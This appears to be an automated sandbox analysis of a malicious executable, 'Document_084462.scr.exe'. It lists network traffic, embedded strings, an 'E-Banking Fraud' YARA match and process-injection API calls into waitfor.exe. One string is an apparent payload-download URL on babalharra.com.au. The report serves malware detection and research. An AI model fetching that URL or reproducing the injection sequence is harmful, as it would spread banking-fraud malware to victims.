            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:12 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:15 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:18 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 18:00:21 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:27 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: Document_084462.scr.exe, 00000000.00000000.12521274336.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Document_084462.scr.exe, 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Document_084462.scr.exe, 00000001.00000000.12946377860.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Document_084462.scr.exe, 00000001.00000001.12948306647.0000000000626000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
            Source: Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://babalharra.com.au/
            Source: Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://babalharra.com.au/)71
            Source: Document_084462.scr.exe, 00000001.00000002.13304887566.0000000036E50000.00000004.00001000.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://babalharra.com.au/hEuJhxvbfOcCGqtagtOtF215.bin
            Source: Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknown HTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49748 version: TLS 1.2
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 0_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            E-Banking Fraud

            Source: Yara match File source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: initial sample Static PE information: Filename: Document_084462.scr.exe
            Source: Document_084462.scr.exe Static file information: Suspicious name
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF34E0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2EB0 NtProtectVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2D10 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2B90 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2BC0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF3C90 NtOpenThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF3C30 NtOpenProcessToken
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF38D0 NtGetContextThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF4570 NtSuspendThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF4260 NtSetContextThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2FB0 NtSetValueKey
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2F30 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2F00 NtCreateFile
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2E80 NtCreateProcessEx
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2EC0 NtQuerySection
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2ED0 NtResumeThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2E00 NtQueueApcThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2E50 NtCreateSection
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2DA0 NtReadVirtualMemory
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2DC0 NtAdjustPrivilegesToken
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2D50 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2CF0 NtDelayExecution
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2CD0 NtEnumerateKey
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2C20 NtSetInformationFile
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2C30 NtMapViewOfSection
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2C10 NtOpenProcess
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2C50 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2B80 NtCreateKey
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2BE0 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2B20 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2B00 NtQueryValueKey
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2B10 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2AA0 NtQueryInformationFile
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2A80 NtClose
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2AC0 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF2A10 NtWriteFile
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF29F0 NtReadFile
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_37AF29D0 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_00133609 NtSetContextThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_0013392A NtSuspendThread
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 1_2_00133C4C NtResumeThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2CF0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2C30 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2D10 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2E50 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2F00 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB29F0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2A80 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2AC0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2A10 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2B80 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2B90 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2BC0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2B00 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2B10 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB34E0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB4570 NtSuspendThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB4260 NtSetContextThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2CD0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2C20 NtSetInformationFile
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2C10 NtOpenProcess
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2C50 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2DA0 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2DC0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2D50 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2EB0 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2E80 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2EC0 NtQuerySection
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2ED0 NtResumeThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2E00 NtQueueApcThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2FB0 NtSetValueKey
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2F30 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB29D0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2AA0 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2BE0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB2B20 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB3C90 NtOpenThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB3C30 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04AB38D0 NtGetContextThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_008E9A67 NtClose
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04D9F038 NtQueryInformationProcess,NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04DA4668 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04DA3618 NtSetContextThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04DA3C58 NtResumeThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04DA3F78 NtQueueApcThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04D9F9CB NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04DA3938 NtSuspendThread
            Source: C:\Windows\SysWOW64\waitfor.exe Code function: 3_2_04DA4A31 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\Document_084462.scr.exe Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7EFBF1_2_37B7EFBF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC6FE01_2_37AC6FE0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACCF001_2_37ACCF00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B70EAD1_2_37B70EAD
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB2EE81_2_37AB2EE8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B60E6D1_2_37B60E6D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B02E481_2_37B02E48
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE0E501_2_37AE0E50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD2DB01_2_37AD2DB0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABAD001_2_37ABAD00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC0D691_2_37AC0D69
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8ACEB1_2_37B8ACEB
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD8CDF1_2_37AD8CDF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACAC201_2_37ACAC20
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3EC201_2_37B3EC20
